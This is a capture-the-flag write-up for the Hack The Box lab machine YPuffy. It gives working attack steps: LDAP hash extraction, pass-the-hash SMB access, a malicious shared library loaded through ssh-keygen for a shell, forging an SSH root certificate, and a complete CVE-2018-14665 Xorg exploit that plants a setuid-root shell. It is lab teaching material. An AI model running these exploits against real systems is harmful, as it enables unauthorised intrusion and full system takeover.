Explore the fundamentals of cybersecurity in the YPuffy Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts#

10.10.10.107 ypuffy.htb

Script to add hosts automatically#

ip="10.10.10.107"
domain="ypuffy.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping#

nmap -sCV ypuffy.htb

Nmap scan report for ypuffy.htb (10.10.10.107)
Host is up (0.050s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 2e:19:e6:af:1b:a7:b0:e8:07:2a:2b:11:5d:7b:c6:04 (RSA)
|   256 dd:0f:6a:2a:53:ee:19:50:d9:e5:e7:81:04:8d:91:b6 (ECDSA)
|_  256 21:9e:db:bd:e1:78:4d:72:b0:ea:b4:97:fb:7f:af:91 (ED25519)
80/tcp  open  http        OpenBSD httpd
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389/tcp open  ldap        (Anonymous bind OK)
445/tcp open  netbios-ssn Samba smbd 4.7.6 (workgroup: YPUFFY)
Service Info: Host: YPUFFY

Host script results:
| smb2-time: 
|   date: 2024-10-12T07:26:44
|_  start_date: N/A
|_clock-skew: mean: 1h19m58s, deviation: 2h18m34s, median: -2s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6)
|   Computer name: ypuffy
|   NetBIOS computer name: YPUFFY\x00
|   Domain name: hackthebox.htb
|   FQDN: ypuffy.hackthebox.htb
|_  System time: 2024-10-12T03:26:45-04:00

LDAP and SMB Privilege Escalation on OpenBSD#

An Nmap scan shows that LDAP allows anonymous login:

389/tcp open  ldap        (Anonymous bind OK)

You can refer to HackTricks: Pentesting LDAP for more insights.

LDAP Enumeration and Finding Alice’s Hash#

First, enumerate the LDAP service:

dc=$(ldapsearch -x -H ldap://ypuffy.htb -s base "namingcontexts" | sed -n 's/^.*namingContexts: //p')
ldapsearch -x -H ldap://ypuffy.htb -b "$dc"

Alternatively, use Nmap for LDAP enumeration:

nmap -n -sV --script "ldap* and not brute" ypuffy.htb

During the enumeration, you’ll find the sambaNTPassword hash for user alice1978.

Access SMB Shares and Download Private Key#

Use Alice’s hash to list SMB shares and download her private key:

smbmap -u alice1978 -p '00000000000000000000000000000000:0B186E661BBDBDCF6047784DE8B9FD8B' -H ypuffy.htb -r
smbmap -u alice1978 -p '00000000000000000000000000000000:0B186E661BBDBDCF6047784DE8B9FD8B' -H ypuffy.htb --download alice/my_private_key.ppk

Convert Key to OpenSSH and SSH into the Machine#

Convert the .ppk key to OpenSSH format and clean up:

puttygen 10.10.10.107-alice_my_private_key.ppk -O private-openssh -o alice_private.key
rm -rf 10.10.10.107-alice_my_private_key.ppk

Now, SSH into the machine:

ssh -i alice_private.key alice1978@ypuffy.htb

Retrieve the user flag:

cat user.txt

Privilege Escalation via doas#

Check the doas configuration:

cat /etc/doas.conf

Alice is allowed to run ssh-keygen as userca:

permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen

With this, you can further escalate privileges.

SSH-Keygen Privilege Escalation#

Using information from GTFOBins: ssh-keygen, we can exploit the ability to load arbitrary libraries as userca. While switching to userca isn’t strictly necessary, I did so to explore and test shell payloads in .so libraries.

cd /tmp
nano poc.c
gcc -shared -fPIC -o lib.so poc.c

#include <stdio.h>
#include <unistd.h>

#define SHELL_PATH "/bin/sh"
#define SHELL_COMMAND "/bin/sh"
 
void __attribute__ ((constructor)) constructor()
{
    puts("[starting shell]");
    printf("Starting %s\n", SHELL_COMMAND);
    long long err = execl(SHELL_PATH, SHELL_PATH, "-c", SHELL_COMMAND, NULL);
    printf("Result: %lld\n", err);
}

Next, use ssh-keygen to load the malicious library:

doas -u userca /usr/bin/ssh-keygen -D ./lib.so

Now, we have escalated privileges to userca:

ypuffy$ id
uid=1001(userca) gid=1001(userca) groups=1001(userca)

cat /etc/ssh/ssh_config

The presence of AuthorizedKeysCommand, AuthorizedPrincipalsCommand, and TrustedUserCAKeys /home/userca/ca.pub indicates that a Certificate Authority (CA) is in place for SSH authentication.

cd /home/userca/.ssh
ssh-keygen -t ecdsa
/usr/bin/ssh-keygen -s /home/userca/ca -I alice1978 -n "$(curl -s "http://127.0.0.1/sshauth?type=principals&username=root")" -z 1 id_ecdsa.pub
ssh -i  id_ecdsa root@localhost

cat /root/root.txt

CVE-2018-14665 Exploitation on OpenBSD#

Alternative Privilege Escalation

To verify the system version, run:

uname -a

Example output:

OpenBSD ypuffy.hackthebox.htb 6.3 GENERIC#100 amd64

This version, OpenBSD 6.3, is vulnerable to CVE-2018-14665, a flaw that allows privilege escalation due to improper handling of X server access controls.

For detailed exploitation steps, refer to the Exploit-DB entry.

cat << EOF > /tmp/xorgasm
cp /bin/sh /usr/local/bin/pwned
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/xorgasm
cd /etc
Xorg -fp "* * * * * root /tmp/xorgasm" -logfile crontab :1 &
sleep 5
pkill Xorg
echo
echo "Be patient for a couple of minutes..."
echo
sleep 120
echo
echo "Don't forget to cleanup and run crontab -e to reload the crontab."
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
/usr/local/bin/pwned